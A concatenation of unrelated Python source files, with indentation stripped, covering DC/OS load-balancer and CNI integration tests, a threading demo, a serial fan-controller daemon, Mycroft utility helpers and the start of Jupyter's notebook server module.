r = dcos_api_session.get('/service/' + dcos_service_name + '/ping')
assert r.status_code == 200
assert 'pong' in r.json()
@retrying.retry(wait_fixed=2000,
stop_max_delay=100 * 2000,
retry_on_exception=lambda x: True)
def geturl(url):
rs = requests.get(url)
assert rs.status_code == 200
r = rs.json()
log.info('geturl {} -> {}'.format(url, r))
return r
def test_l4lb(dcos_api_session):
'''Test l4lb is load balancing between all the backends
* create 5 apps using the same VIP
* get uuid from the VIP in parallel from many threads
* verify that 5 uuids have been returned
* only testing if all 5 are hit at least once
'''
if not lb_enabled():
pytest.skip('Load Balancer disabled')
numapps = 5
numthreads = numapps * 4
apps = []
rvs = deque()
backends = []
dnsname = 'l4lbtest.marathon.l4lb.thisdcos.directory:5000'
with contextlib.ExitStack() as stack:
for _ in range(numapps):
origin_app, origin_uuid = \
test_helpers.marathon_test_app(
healthcheck_protocol=marathon.Healthcheck.MESOS_HTTP)
# same vip for all the apps
origin_app['portDefinitions'][0]['labels'] = {'VIP_0': '/l4lbtest:5000'}
apps.append(origin_app)
stack.enter_context(dcos_api_session.marathon.deploy_and_cleanup(origin_app))
sp = dcos_api_session.marathon.get_app_service_endpoints(origin_app['id'])
backends.append({'port': sp[0].port, 'ip': sp[0].host})
# make sure that the service point responds
geturl('http://{}:{}/ping'.format(sp[0].host, sp[0].port))
# make sure that the VIP is responding too
geturl('http://{}/ping'.format(dnsname))
vips = geturl("http://localhost:62080/v1/vips")
[vip] = [vip for vip in vips if vip['vip'] == dnsname and vip['protocol'] == 'tcp']
for backend in vip['backend']:
backends.remove(backend)
assert backends == []
# do many requests in parallel.
def thread_request():
# deque is thread safe
rvs.append(geturl('http://l4lbtest.marathon.l4lb.thisdcos.directory:5000/test_uuid'))
threads = [threading.Thread(target=thread_request) for i in range(0, numthreads)]
for t in threads:
t.start()
for t in threads:
t.join()
expected_uuids = [a['id'].split('-')[2] for a in apps]
received_uuids = [r['test_uuid'] for r in rvs if r is not None]
assert len(set(expected_uuids)) == numapps
assert len(set(received_uuids)) == numapps
assert set(expected_uuids) == set(received_uuids)
def test_dcos_cni_l4lb(dcos_api_session):
'''
This tests the `dcos - l4lb` CNI plugins:
https: // github.com / dcos / dcos - cni / tree / master / cmd / l4lb
The `dcos-l4lb` CNI plugins allows containers running on networks that don't
necessarily have routes to spartan interfaces and minuteman VIPs to consume DNS
service from spartan and layer-4 load-balancing services from minuteman by
injecting spartan and minuteman services into the container's network
namespace. You can read more about the motivation for this CNI plugin and type
of problems it solves in this design doc:
https://docs.google.com/document/d/1xxvkFknC56hF-EcDmZ9tzKsGiZdGKBUPfrPKYs85j1k/edit?usp=sharing
In order to test `dcos-l4lb` CNI plugin we emulate a virtual network that
lacks routes for spartan interface and minuteman VIPs. In this test, we
first install a virtual network called `spartan-net` on one of the agents.
The `spartan-net` is a CNI network that is a simple BRIDGE network with the
caveat that it doesn't have any default routes. `spartan-net` has routes
only for the agent network. In other words it doesn't have any routes
towards the spartan-interfaces or minuteman VIPs.
We then run a server (our python ping-pong server) on the DC/OS overlay.
Finally to test that the `dcos-l4lb` plugin, which is also part of
`spartan-net` is able to inject the Minuteman and Spartan services into the
contianer's netns, we start a client on the `spartan-net` and try to `curl` the
`ping-pong` server using its VIP. Without the Minuteman and Spartan services
injected in the container's netns the expectation would be that this `curl`
would fail, with a successful `curl` execution on the VIP allowing the
test-case to PASS.
'''
if not lb_enabled():
pytest.skip('Load Balancer disabled')
expanded_config = test_helpers.get_expanded_config()
if expanded_config.get('security') == 'strict':
pytest.skip('Cannot setup CNI config with EE strict mode enabled')
# Run all the test application on the first agent node
host = dcos_api_session.slaves[0]
# CNI configuration of `spartan-net`.
spartan_net = {
'cniVersion': '0.2.0',
'name': 'spartan-net',
'type': 'dcos-l4lb',
'delegate': {
'type': 'mesos-cni-port-mapper',
'excludeDevices': ['sprt-cni0'],
'chain': 'spartan-net',
'delegate': {
'type': 'bridge',
'bridge': 'sprt-cni0',
'ipMasq': True,
'isGateway': True,
'ipam': {
'type': 'host-local',
'subnet': '192.168.250.0/24',
'routes': [
# Reachability to DC/OS overlay.
{'dst': '9.0.0.0/8'},
# Reachability to all private address subnet. We need
# this reachability since different cloud providers use
# different private address spaces to launch tenant
# networks.
{'dst': '10.0.0.0/8'},
{'dst': '172.16.0.0/12'},
{'dst': '192.168.0.0/16'}
]
}
}
}
}
log.info("spartan-net config:{}".format(json.dumps(spartan_net)))
# Application to deploy CNI configuration.
cni_config_app = MarathonApp(
marathon.Container.NONE, marathon.Network.HOST, host,
app_name_fmt='/integration-test/cni-l4lb/config-{}')
# Override the default test app command with a command to write the CNI
# configuration.
#
# NOTE: We add the original command at the end of this command so that the task
# stays alive for the test harness to make sure that the task got deployed.
# Ideally we should be able to deploy one of tasks using the test harness
# but that doesn't seem to be the case here.
cni_config_app.app['cmd'] = \
"echo '{}' > {} && {}".format(
json.dumps(spartan_net),
'/opt/mesosphere/etc/dcos/network/cni/spartan.cni',
cni_config_app.app['cmd'])
log.info("CNI Config application: {}".format(cni_config_app.app))
try:
cni_config_app.deploy(dcos_api_session)
cni_config_app.wait(dcos_api_session)
finally:
cni_config_app.purge(dcos_api_session)
log.info("CNI Config has been deployed on {}".format(host))
# Get the host on which the `spartan-net` was installed.
# Launch the test-app on DC/OS overlay, with a VIP.
server_vip_label = '/spartanvip:10000'
server_vip_addr = 'spartanvip.marathon.l4lb.thisdcos.directory:10000'
# Launch the test_server in ip-per-container mode (user network)
server_app = MarathonApp(
marathon.Container.MESOS, marathon.Network.USER, host,
vip=server_vip_label, app_name_fmt='/integration-test/cni-l4lb/server-{}')
log.info("Server application: {}".format(server_app.app))
# Get the client app on the 'spartan-net' network.
client_app = MarathonApp(
marathon.Container.MESOS, marathon.Network.USER, host,
network_name='spartan-net', app_name_fmt='/integration-test/cni-l4lb/client-{}')
log.info("Client application: {}".format(client_app.app))
try:
# Launch the test application
client_app.deploy(dcos_api_session)
server_app.deploy(dcos_api_session)
# Wait for the test application
server_app.wait(dcos_api_session)
client_app.wait(dcos_api_session)
client_host, client_port = client_app.hostport(dcos_api_session)
# Check linux kernel version
uname = ensure_routable('uname -r', client_host, client_port, json_output=False)
if '3.10.0-862' <= uname < '3.10.0-898':
return pytest.skip('See https://bugzilla.redhat.com/show_bug.cgi?id=1572983')
# Change the client command task to do a curl on the server we just deployed.
cmd = '/opt/mesosphere/bin/curl -s -f -m 5 http://{}/test_uuid'.format(server_vip_addr)
assert ensure_routable(cmd, client_host, client_port)['test_uuid'] == server_app.uuid
finally:
server_app.purge(dcos_api_session)
client_app.purge(dcos_api_session)
def enum2str(value):
return str(value).split('.')[-1].lower()
def net2str(value, ipv6):
return enum2str(value) if not ipv6 else 'ipv6'
@retrying.retry(wait_fixed=2000,
stop_max_delay=100 * 2000,
retry_on_exception=lambda x: True)
def test_dcos_net_cluster_identity(dcos_api_session):
cluster_id = 'minuteman' # default
expanded_config = test_helpers.get_expanded_config()
if expanded_config['dcos_net_cluster_identity'] == 'true':
with open('/var/lib/dcos/cluster-id') as f:
cluster_id = "'{}'".format(f.readline().rstrip())
argv = ['sudo', '/opt/mesosphere/bin/dcos-net-env', 'eval', 'erlang:get_cookie().']
cookie = subprocess.check_output(argv, stderr=subprocess.STDOUT).decode('utf-8').rstrip()
assert cluster_id == cookie, "cluster_id: {}, cookie: {}".format(cluster_id, cookie)
|
identifyingThreads.py
|
import threading
import time
def myThread():
print("Thread {} starting".format(threading.currentThread().getName()))
time.sleep(10)
print("Thread {} ending".format(threading.currentThread().getName()))
for i in range(4):
threadName = "Thread-" + str(i)
thread = threading.Thread(name=threadName, target=myThread)
thread.start()
print("{}".format(threading.enumerate()))
|
fanCtrl.server.py
|
import sys, getopt, serial
import threading
import time
import os
import os.path
lines = -2
lastRecivedLine = ""
logEnabled = False
logFile = ""
lockFile = "/tmp/fanController.lock"
def createRunLock():
outputFileHandler = open(lockFile,"a")
outputFileHandler.write("lock\r\n")
outputFileHandler.close()
def rmRunLock():
os.remove(lockFile)
def checkRunLock():
if os.path.exists(lockFile):
sys.exit(0)
else:
createRunLock()
def log(data):
if logEnabled == True:
outputFileHandler = open(logFile,"a")
outputFileHandler.write(data+"\r\n")
outputFileHandler.close()
def closeApplication(run_event, thread):
print "stop."
if run_event != None:
run_event.clear()
if thread != None:
thread.join()
rmRunLock()
# print "threads successfully closed"
def readSerialData(ser,run_event):
outputFile = "/tmp/fanController/output"
global lines
global lastRecivedLine
while run_event.is_set():
# print str(lines)+ " '"+lastRecivedLine+"'"
reading = ser.readline().decode()
if len(reading) > 0:
reading = reading[:-1]
lastRecivedLine = reading;
lines = lines + 1
outputData = "[recv] "+str(reading)
outputFileHandler = open(outputFile,"a")
outputFileHandler.write(outputData+"\r\n")
outputFileHandler.close()
log(outputData)
print outputData
else:
lastRecivedLine = ""
time.sleep(1)
def sendSerialData(serial_port,data):
outputData = "[send] "+str(data)
log(outputData)
print outputData
serial_port.write(data+"\r\n")
def usage():
print 'fanCtrl.server.py -p[--port] <port> [-l[--log] <logfile>]'
sys.exit(2)
def main(argv):
global logEnabled
global logFile
inputFile = "/tmp/fanController/input"
port = ''
try:
opts, args = getopt.getopt(argv,"hp:l:",["port=","log="])
except getopt.GetoptError:
usage()
for opt, arg in opts:
if opt == '-h':
usage()
elif opt in ("-p", "--port"):
port = arg
elif opt in ("-l", "--log"):
logFile = arg
if port is "":
usage()
if len(logFile) > 0:
logEnabled = True
# print 'port is ', port
try:
serial_port = serial.Serial(port, 9600, timeout=0)
run_event = threading.Event()
run_event.set()
thread = threading.Thread(target=readSerialData, args=(serial_port,run_event,))
thread.start()
serial_port.write("hello\r\n")
time.sleep(3)
cmdSent = False
while True:
time.sleep(1)
if os.path.exists(inputFile):
inputFileHandler = open(inputFile,"r")
inputData = inputFileHandler.read()
inputData = inputData[:-1]
sendSerialData(serial_port, inputData)
inputFileHandler.close()
os.remove(inputFile)
pass
except KeyboardInterrupt:
print "Reviced KeyboardInterrupt"
closeApplication(run_event, thread)
except:
print "Error:"
print "Unexpected error:", sys.exc_info()
closeApplication(None, None)
if __name__ == "__main__":
checkRunLock()
if not os.path.exists("/tmp/fanController/"):
os.makedirs("/tmp/fanController/")
main(sys.argv[1:])
|
__init__.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from threading import Thread
from time import sleep
import requests
import os
from os.path import isdir, join
import re
import socket
def get_ip():
# taken from https://stackoverflow.com/a/28950776/13703283
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except Exception:
IP = '127.0.0.1'
finally:
s.close()
return IP
def get_external_ip():
return requests.get('https://api.ipify.org').text
def get_mycroft_root():
paths = [
"/opt/venvs/mycroft-core/lib/python3.7/site-packages/", # mark1/2
"/opt/venvs/mycroft-core/lib/python3.4/site-packages/ ", # old mark1 installs
"/home/pi/mycroft-core" # picroft
]
for p in paths:
if isdir(join(p, "mycroft")):
return p
return None
def resolve_resource_file(res_name, root_path=None):
"""Convert a resource into an absolute filename.
Resource names are in the form: 'filename.ext'
or 'path/filename.ext'
The system wil look for ~/.mycroft/res_name first, and
if not found will look at /opt/mycroft/res_name,
then finally it will look for res_name in the 'mycroft/res'
folder of the source code package.
Example:
With mycroft running as the user 'bob', if you called
resolve_resource_file('snd/beep.wav')
it would return either '/home/bob/.mycroft/snd/beep.wav' or
'/opt/mycroft/snd/beep.wav' or '.../mycroft/res/snd/beep.wav',
where the '...' is replaced by the path where the package has
been installed.
Args:
res_name (str): a resource path/name
Returns:
str: path to resource or None if no resource found
"""
# TODO handle cyclic import
from ovos_utils.configuration import read_mycroft_config
config = read_mycroft_config()
# First look for fully qualified file (e.g. a user setting)
if os.path.isfile(res_name):
return res_name
# Now look for ~/.mycroft/res_name (in user folder)
filename = os.path.expanduser("~/.mycroft/" + res_name)
if os.path.isfile(filename):
return filename
# Next look for /opt/mycroft/res/res_name
data_dir = os.path.expanduser(config['data_dir'])
filename = os.path.expanduser(os.path.join(data_dir, res_name))
if os.path.isfile(filename):
return filename
# Finally look for it in the source package
paths = [
"/opt/venvs/mycroft-core/lib/python3.7/site-packages/", # mark1/2
"/opt/venvs/mycroft-core/lib/python3.4/site-packages/ ", # old mark1 installs
"/home/pi/mycroft-core" # picroft
]
if root_path:
paths += [root_path]
for p in paths:
filename = os.path.join(p, 'mycroft', 'res', res_name)
filename = os.path.abspath(os.path.normpath(filename))
if os.path.isfile(filename):
return filename
return None # Resource cannot be resolved
def create_daemon(target, args=(), kwargs=None):
"""Helper to quickly create and start a thread with daemon = True"""
t = Thread(target=target, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return t
def create_loop(target, interval, args=(), kwargs=None):
"""
Helper to quickly create and start a thread with daemon = True
and repeat it every interval seconds
"""
def loop(*args, **kwargs):
try:
while True:
target(*args, **kwargs)
sleep(interval)
except KeyboardInterrupt:
return
return create_daemon(loop, args, kwargs)
def wait_for_exit_signal():
"""Blocks until KeyboardInterrupt is received"""
try:
while True:
sleep(100)
except KeyboardInterrupt:
pass
def get_handler_name(handler):
"""Name (including class if available) of handler function.
Arguments:
handler (function): Function to be named
Returns:
string: handler name as string
"""
if '__self__' in dir(handler) and 'name' in dir(handler.__self__):
return handler.__self__.name + '.' + handler.__name__
else:
return handler.__name__
def camel_case_split(identifier: str) -> str:
"""Split camel case string"""
regex = '.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)'
matches = re.finditer(regex, identifier)
return ' '.join([m.group(0) for m in matches])
def rotate_list(l, n=1):
return l[n:] + l[:n]
|
notebookapp.py
|
"""A tornado based Jupyter notebook server."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import notebook
import asyncio
import binascii
import datetime
import errno
import functools
import gettext
import hashlib
import hmac
import importlib
import io
import ipaddress
import json
import logging
import mimetypes
import os
import random
import re
import select
import signal
import socket
import stat
import sys
import tempfile
import threading
import time
import warnings
import webbrowser
try:
import resource
except ImportError:
# Windows
resource = None
from base64 import encodebytes
from jinja2 import Environment, FileSystemLoader
from notebook.transutils import trans, _
# Install the pyzmq ioloop. This has to be done before anything else from
# tornado is imported.
from zmq.eventloop import ioloop
ioloop.install()
# check for tornado 3.1.0
try:
import tornado
except ImportError as e:
raise ImportError(_("The Jupyter Notebook requires tornado >= 5.0")) from e
try:
version_info = tornado.version_info
except AttributeError as e:
raise ImportError(_("The Jupyter Notebook requires tornado >= 5.0, but you have < 1.1.0")) from e
if version_info < (5,0):
raise ImportError(_("The Jupyter Notebook requires tornado >= 5.0, but you have %s") % tornado.version)
from tornado import httpserver
from tornado import web
from tornado.httputil import url_concat
from tornado.log import LogFormatter, app_log, access_log, gen_log
if not sys.platform.startswith('win'):
from tornado.netutil import bind_unix_socket
from notebook import (
DEFAULT_NOTEBOOK_PORT,
DEFAULT_STATIC_FILES_PATH,
DEFAULT_TEMPLATE_PATH_LIST,
__version__,
)
from .base.handlers import Template404, RedirectWithParams
from .log import log_request
from .services.kernels.kernelmanager import MappingKernelManager, AsyncMappingKernelManager
from .services.config import ConfigManager
from .services.contents.manager import ContentsManager
from .services.contents.filemanager import FileContentsManager
from .services.contents.largefilemanager import LargeFileManager
from .services.sessions.sessionmanager import SessionManager
from .gateway.managers import GatewayKernelManager, GatewayKernelSpecManager, GatewaySessionManager, GatewayClient
from .auth.login import LoginHandler
from .auth.logout import LogoutHandler
from .base.handlers import FileFindHandler
from traitlets.config import Config
from traitlets.config.application import catch_config_error, boolean_flag
from jupyter_core.application import (
JupyterApp, base_flags, base_aliases,
)
from jupyter_core.paths import jupyter_config_path
from jupyter_client import KernelManager
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_client.session import Session
from nbformat.sign import NotebookNotary
from traitlets import (
Any, Dict, Unicode, Integer, List, Bool, Bytes, Instance,
TraitError, Type, Float, observe, default, validate
)
from ipython_genutils import py3compat
from jupyter_core.paths import jupyter_runtime_dir, jupyter_path
from notebook._sysinfo import get_sys_info
from ._tz import utcnow, utcfromtimestamp
from .utils import (
check_pid,
pathname2url,
run_sync,
unix_socket_in_use,
url_escape,
url_path_join,
urldecode_unix_socket_path,
urlencode_unix_socket,
urlencode_unix_socket_path,
urljoin,
)
# Check if we can use async kernel management
try:
from jupyter_client import AsyncMultiKernelManager
async_kernel_mgmt_available = True
except ImportError:
async_kernel_mgmt_available = False
# Tolerate missing terminado package.
try:
from .terminal import TerminalManager
terminado_available = True
except ImportError:
terminado_available = False
#-----------------------------------------------------------------------------
# Module globals
#-----------------------------------------------------------------------------
_examples = """
jupyter notebook # start the notebook
jupyter notebook --certfile=mycert.pem # use SSL/TLS certificate
jupyter notebook password # enter a password to protect the server
"""
#-----------------------------------------------------------------------------
# Helper functions
#-----------------------------------------------------------------------------
def random_ports(port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
def load_handlers(name):
"""Load the (URL pattern, handler) tuples for each component."""
mod = __import__(name, fromlist=['default_handlers'])
return mod.default_handlers
#-----------------------------------------------------------------------------
# The Tornado web application
#-----------------------------------------------------------------------------
class NotebookWebApplication(web.Application):
def __init__(self, jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager,
config_manager, extra_services, log,
base_url, default_url, settings_overrides, jinja_env_options):
settings = self.init_settings(
jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager, config_manager,
extra_services, log, base_url,
default_url, settings_overrides, jinja_env_options)
handlers = self.init_handlers(settings)
if settings['autoreload']:
log.info('Autoreload enabled: the webapp will restart when any Python src file changes.')
super().__init__(handlers, **settings)
def init_settings(self, jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager,
config_manager, extra_services,
log, base_url, default_url, settings_overrides,
jinja_env_options=None):
_template_path = settings_overrides.get(
"template_path",
jupyter_app.template_file_path,
)
if isinstance(_template_path, py3compat.string_types):
_template_path = (_template_path,)
template_path = [os.path.expanduser(path) for path in _template_path]
jenv_opt = {"autoescape": True}
jenv_opt.update(jinja_env_options if jinja_env_options else {})
env = Environment(loader=FileSystemLoader(template_path), extensions=['jinja2.ext.i18n'], **jenv_opt)
sys_info = get_sys_info()
# If the user is running the notebook in a git directory, make the assumption
# that this is a dev install and suggest to the developer `npm run build:watch`.
base_dir = os.path.realpath(os.path.join(__file__, '..', '..'))
dev_mode = os.path.exists(os.path.join(base_dir, '.git'))
nbui = gettext.translation('nbui', localedir=os.path.join(base_dir, 'notebook/i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
if dev_mode:
DEV_NOTE_NPM = """It looks like you're running the notebook from source.
If you're working on the Javascript of the notebook, try running
%s
in another terminal window to have the system incrementally
watch and build the notebook's JavaScript for you, as you make changes.""" % 'npm run build:watch'
log.info(DEV_NOTE_NPM)
if sys_info['commit_source'] == 'repository':
# don't cache (rely on 304) when working from master
version_hash = ''
else:
# reset the cache on server restart
version_hash = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
if jupyter_app.ignore_minified_js:
log.warning(_("""The `ignore_minified_js` flag is deprecated and no longer works."""))
log.warning(_("""Alternatively use `%s` when working on the notebook's Javascript and LESS""") % 'npm run build:watch')
warnings.warn(_("The `ignore_minified_js` flag is deprecated and will be removed in Notebook 6.0"), DeprecationWarning)
now = utcnow()
root_dir = contents_manager.root_dir
home = py3compat.str_to_unicode(os.path.expanduser('~'), encoding=sys.getfilesystemencoding())
if root_dir.startswith(home + os.path.sep):
# collapse $HOME to ~
root_dir = '~' + root_dir[len(home):]
# Use the NotebookApp logger and its formatting for tornado request logging.
log_function = functools.partial(
log_request, log=log, log_json=jupyter_app.log_json)
settings = dict(
# basics
log_function=log_function,
base_url=base_url,
default_url=default_url,
template_path=template_path,
static_path=jupyter_app.static_file_path,
static_custom_path=jupyter_app.static_custom_path,
static_handler_class = FileFindHandler,
static_url_prefix = url_path_join(base_url,'/static/'),
static_handler_args = {
# don't cache custom.js
'no_cache_paths': [url_path_join(base_url, 'static', 'custom')],
},
version_hash=version_hash,
ignore_minified_js=jupyter_app.ignore_minified_js,
# rate limits
iopub_msg_rate_limit=jupyter_app.iopub_msg_rate_limit,
iopub_data_rate_limit=jupyter_app.iopub_data_rate_limit,
rate_limit_window=jupyter_app.rate_limit_window,
# authentication
cookie_secret=jupyter_app.cookie_secret,
login_url=url_path_join(base_url,'/login'),
login_handler_class=jupyter_app.login_handler_class,
logout_handler_class=jupyter_app.logout_handler_class,
password=jupyter_app.password,
xsrf_cookies=True,
disable_check_xsrf=jupyter_app.disable_check_xsrf,
allow_remote_access=jupyter_app.allow_remote_access,
local_hostnames=jupyter_app.local_hostnames,
authenticate_prometheus=jupyter_app.authenticate_prometheus,
# managers
kernel_manager=kernel_manager,
contents_manager=contents_manager,
session_manager=session_manager,
kernel_spec_manager=kernel_spec_manager,
config_manager=config_manager,
# handlers
extra_services=extra_services,
# Jupyter stuff
started=now,
# place for extensions to register activity
# so that they can prevent idle-shutdown
last_activity_times={},
jinja_template_vars=jupyter_app.jinja_template_vars,
nbextensions_path=jupyter_app.nbextensions_path,
websocket_url=jupyter_app.websocket_url,
mathjax_url=jupyter_app.mathjax_url,
mathjax_config=jupyter_app.mathjax_config,
shutdown_button=jupyter_app.quit_button,
config=jupyter_app.config,
config_dir=jupyter_app.config_dir,
allow_password_change=jupyter_app.allow_password_change,
server_root_dir=root_dir,
jinja2_env=env,
terminals_available=terminado_available and jupyter_app.terminals_enabled,
)
# allow custom overrides for the tornado web app.
settings.update(settings_overrides)
return settings
def init_handlers(self, settings):
"""Load the (URL pattern, handler) tuples for each component."""
# Order matters. The first handler to match the URL will handle the request.
handlers = []
# load extra services specified by users before default handlers
for service in settings['extra_services']:
handlers.extend(load_handlers(service))
handlers.extend(load_handlers('notebook.tree.handlers'))
handlers.extend([(r"/login", settings['login_handler_class'])])
handlers.extend([(r"/logout", settings['logout_handler_class'])])
handlers.extend(load_handlers('notebook.files.handlers'))
handlers.extend(load_handlers('notebook.view.handlers'))
handlers.extend(load_handlers('notebook.notebook.handlers'))
handlers.extend(load_handlers('notebook.nbconvert.handlers'))
handlers.extend(load_handlers('notebook.bundler.handlers'))
handlers.extend(load_handlers('notebook.kernelspecs.handlers'))
handlers.extend(load_handlers('notebook.edit.handlers'))
handlers.extend(load_handlers('notebook.services.api.handlers'))
handlers.extend(load_handlers('notebook.services.config.handlers'))
handlers.extend(load_handlers('notebook.services.contents.handlers'))
handlers.extend(load_handlers('notebook.services.sessions.handlers'))
handlers.extend(load_handlers('notebook.services.nbconvert.handlers'))
handlers.extend(load_handlers('notebook.services.security.handlers'))
handlers.extend(load_handlers('notebook.services.shutdown'))
handlers.extend(load_handlers('notebook.services.kernels.handlers'))
handlers.extend(load_handlers('notebook.services.kernelspecs.handlers'))
handlers.extend(settings['contents_manager'].get_extra_handlers())
# If gateway mode is enabled, replace appropriate handlers to perform redirection
if GatewayClient.instance().gateway_enabled:
# for each handler required for gateway, locate its pattern
# in the current list and replace that entry...
gateway_handlers = load_handlers('notebook.gateway.handlers')
for i, gwh in enumerate(gateway_handlers):
for j, h in enumerate(handlers):
if gwh[0] == h[0]:
handlers[j] = (gwh[0], gwh[1])
break
handlers.append(
(r"/nbextensions/(.*)", FileFindHandler, {
'path': settings['nbextensions_path'],
'no_cache_paths': ['/'], # don't cache anything in nbextensions
}),
)
handlers.append(
(r"/custom/(.*)", FileFindHandler, {
'path': settings['static_custom_path'],
'no_cache_paths': ['/'], # don't cache anything in custom
})
)
# register base handlers last
handlers.extend(load_handlers('notebook.base.handlers'))
# set the URL that will be redirected from `/`
handlers.append(
(r'/?', RedirectWithParams, {
'url' : settings['default_url'],
'permanent': False, # want 302, not 301
})
)
# prepend base_url onto the patterns that we match
new_handlers = []
for handler in handlers:
pattern = url_path_join(settings['base_url'], handler[0])
new_handler = tuple([pattern] + list(handler[1:]))
new_handlers.append(new_handler)
# add 404 on the end, which will catch everything that falls through
new_handlers.append((r'(.*)', Template404))
return new_handlers
def last_activity(self):
"""Get a UTC timestamp for when the server last did something.
Includes: API activity, kernel activity, kernel shutdown, and terminal
activity.
"""
sources = [
self.settings['started'],
self.settings['kernel_manager'].last_kernel_activity,
]
try:
sources.append(self.settings['api_last_activity'])
except KeyError:
pass
try:
sources.append(self.settings['terminal_last_activity'])
except KeyError:
pass
sources.extend(self.settings['last_activity_times'].values())
return max(sources)
class NotebookPasswordApp(JupyterApp):
"""Set a password for the notebook server.
Setting a password secures the notebook server
and removes the need for token-based authentication.
"""
description = __doc__
def _config_file_default(self):
return os.path.join(self.config_dir, 'jupyter_notebook_config.json')
def start(self):
from .auth.security import set_password
set_password(config_file=self.config_file)
self.log.info("Wrote hashed password to %s" % self.config_file)
def shutdown_server(server_info, timeout=5, log=None):
"""Shutdown a notebook server in a separate process.
*server_info* should be a dictionary as produced by list_running_servers().
Will first try to request shutdown using /api/shutdown .
On Unix, if the server is still running after *timeout* seconds, it will
send SIGTERM. After another timeout, it escalates to SIGKILL.
Returns True if the server was stopped by any means, False if stopping it
failed (on Windows).
"""
from tornado import gen
from tornado.httpclient import AsyncHTTPClient, HTTPClient, HTTPRequest
from tornado.netutil import Resolver
url = server_info['url']
pid = server_info['pid']
resolver = None
# UNIX Socket handling.
if url.startswith('http+unix://'):
# This library doesn't understand our URI form, but it's just HTTP.
url = url.replace('http+unix://', 'http://')
class UnixSocketResolver(Resolver):
def initialize(self, resolver):
self.resolver = resolver
def close(self):
self.resolver.close()
@gen.coroutine
def resolve(self, host, port, *args, **kwargs):
raise gen.Return([
(socket.AF_UNIX, urldecode_unix_socket_path(host))
])
resolver = UnixSocketResolver(resolver=Resolver())
req = HTTPRequest(url + 'api/shutdown', method='POST', body=b'', headers={
'Authorization': 'token ' + server_info['token']
})
if log: log.debug("POST request to %sapi/shutdown", url)
AsyncHTTPClient.configure(None, resolver=resolver)
HTTPClient(AsyncHTTPClient).fetch(req)
# Poll to see if it shut down.
for _ in range(timeout*10):
if not check_pid(pid):
if log: log.debug("Server PID %s is gone", pid)
return True
time.sleep(0.1)
if sys.platform.startswith('win'):
return False
if log: log.debug("SIGTERM to PID %s", pid)
os.kill(pid, signal.SIGTERM)
# Poll to see if it shut down.
for _ in range(timeout * 10):
if not check_pid(pid):
if log: log.debug("Server PID %s is gone", pid)
return True
time.sleep(0.1)
if log: log.debug("SIGKILL to PID %s", pid)
os.kill(pid, signal.SIGKILL)
return True # SIGKILL cannot be caught
class NbserverStopApp(JupyterApp):
version = __version__
description="Stop currently running notebook server."
port = Integer(DEFAULT_NOTEBOOK_PORT, config=True,
help="Port of the server to be killed. Default %s" % DEFAULT_NOTEBOOK_PORT)
sock = Unicode(u'', config=True,
help="UNIX socket of the server to be killed.")
def parse_command_line(self, argv=None):
super().parse_command_line(argv)
if self.extra_args:
try:
self.port = int(self.extra_args[0])
except ValueError:
# self.extra_args[0] was not an int, so it must be a string (unix socket).
self.sock = self.extra_args[0]
def shutdown_server(self, server):
return shutdown_server(server, log=self.log)
def _shutdown_or_exit(self, target_endpoint, server):
print("Shutting down server on %s..." % target_endpoint)
server_stopped = self.shutdown_server(server)
if not server_stopped and sys.platform.startswith('win'):
# the pid check on Windows appears to be unreliable, so fetch another
# list of servers and ensure our server is not in the list before
# sending the wrong impression.
servers = list(list_running_servers(self.runtime_dir))
if server not in servers:
server_stopped = True
if not server_stopped:
sys.exit("Could not stop server on %s" % target_endpoint)
@staticmethod
def _maybe_remove_unix_socket(socket_path):
try:
os.unlink(socket_path)
except (OSError, IOError):
pass
def start(self):
servers = list(list_running_servers(self.runtime_dir))
if not servers:
self.exit("There are no running servers (per %s)" % self.runtime_dir)
for server in servers:
if self.sock:
sock = server.get('sock', None)
if sock and sock == self.sock:
self._shutdown_or_exit(sock, server)
# Attempt to remove the UNIX socket after stopping.
self._maybe_remove_unix_socket(sock)
return
elif self.port:
port = server.get('port', None)
if port == self.port:
self._shutdown_or_exit(port, server)
return
else:
current_endpoint = self.sock or self.port
print(
"There is currently no server running on {}".format(current_endpoint),
file=sys.stderr
)
print("Ports/sockets currently in use:", file=sys.stderr)
for server in servers:
print(" - {}".format(server.get('sock') or server['port']), file=sys.stderr)
self.exit(1)
class NbserverListApp(JupyterApp):
version = __version__
description=_("List currently running notebook servers.")
flags = dict(
jsonlist=({'NbserverListApp': {'jsonlist': True}},
_("Produce machine-readable JSON list output.")),
json=({'NbserverListApp': {'json': True}},
_("Produce machine-readable JSON object on each line of output.")),
)
jsonlist = Bool(False, config=True,
help=_("If True, the output will be a JSON list of objects, one per "
"active notebook server, each with the details from the "
"relevant server info file."))
json = Bool(False, config=True,
help=_("If True, each line of output will be a JSON object with the "
"details from the server info file. For a JSON list output, "
"see the NbserverListApp.jsonlist configuration value"))
def start(self):
serverinfo_list = list(list_running_servers(self.runtime_dir))
if self.jsonlist:
print(json.dumps(serverinfo_list, indent=2))
elif self.json:
for serverinfo in serverinfo_list:
print(json.dumps(serverinfo))
else:
print("Currently running servers:")
for serverinfo in serverinfo_list:
url = serverinfo['url']
if serverinfo.get('token'):
url = url + '?token=%s' % serverinfo['token']
